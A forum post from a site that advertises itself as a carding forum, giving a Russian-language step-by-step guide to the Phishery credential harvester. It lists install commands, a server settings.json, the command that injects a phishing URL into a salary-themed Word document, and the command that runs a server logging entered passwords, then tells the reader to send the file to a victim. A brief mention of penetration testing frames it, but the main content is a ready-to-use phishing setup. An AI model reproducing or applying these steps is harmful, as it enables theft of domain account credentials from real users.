Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Phishery. Получаем учетные данные пользователя

Download_Link

Участник клуба
Регистрация
7 Июл 2020
Сообщения
404
Реакции
58
Депозит
200$
В рамках тестирования на проникновение часто приходится прибегать к социальной инженерии. И один из самых ценных видов информации, который можно получить у пользователя — это его аутентификационные данные доменной учетной записи. Способов получения очень много, один из них — использовать инструмент Phishery. Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.
Установка
Установка в Kali Linux

В Kali Linux установка производится через пакетный менеджер:

apt-get install phishery

Установка в Debian

Если требуется установить на чистый сервер, то под требуемую архитектуру скачиваем последнюю версию с исполняемыми файлами по адресу:


Releases · ryhanson/phishery
An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector - ryhanson/phishery

github.com
(ссылка может меняться с выходом новых версий):
wget https://github.com/ryhanson/phishery/releases/download/v1.0.2/phishery1.0.2linux-amd64.tar.gz
Создаем каталог phishery:
mkdir phishery
Распаковываем:
tar -xvf phishery.tar.gz --strip=1 -C ./phishery
И переходим в каталог:
cd phishery
Подготовка к работе
Получаем SSL сертификат на наше доменное имя, чтобы при фишинге не появлялось дополнительных окон с предупреждением (получить сертификат можно например у Let’s Encrypt).
Открываем файл настроек (settings.json):
{
"ip": "0.0.0.0",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 200,
"responseFile": "template.dotx",
"responseHeaders": [
["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
]
}
port — порт, на котором будет работать сервер;
sslCert — действительный сертификат;
sslKey — действительный ключ.

Создание фишингового файла

После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код (в примере zarplata.docx) и добавляем в него фишинговый код:

./phishery -u https://blackdiver.net/docs -i zarplata.docx -o zarplata_phish.docx


описание параметров:
-u — адрес, по которому будет доступен фишинговый сервер;
-i — файл, в который будет встраиваться фишинговый запрос (файл может содержать любую информацию, этот текст увидит пользователь при открытии файла).
-o — имя создаваемого файла с закладкой.
Запуск сервера

Запускаем сервер, для получения и сохранения аутентификационных данных (сервер не умеет самостоятельно работать в режиме демона. Поэтому окно с запущенным сервером нужно держать постоянно открытым или вручную запустить в режиме демона:

./phishery -s settings.json -c credentials.json


описание параметров:
-s — файл настроек;
-c — файл, в который будут записываться данные аутентификации.
Получение учетных данных
Теперь отправляем файл жертве и ждем открытия.
Окно

При открытии файла, поверх MS Word появится окно запроса имени и пароля.


При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах, а так же запишутся в файл credentials.json
 
Сверху Снизу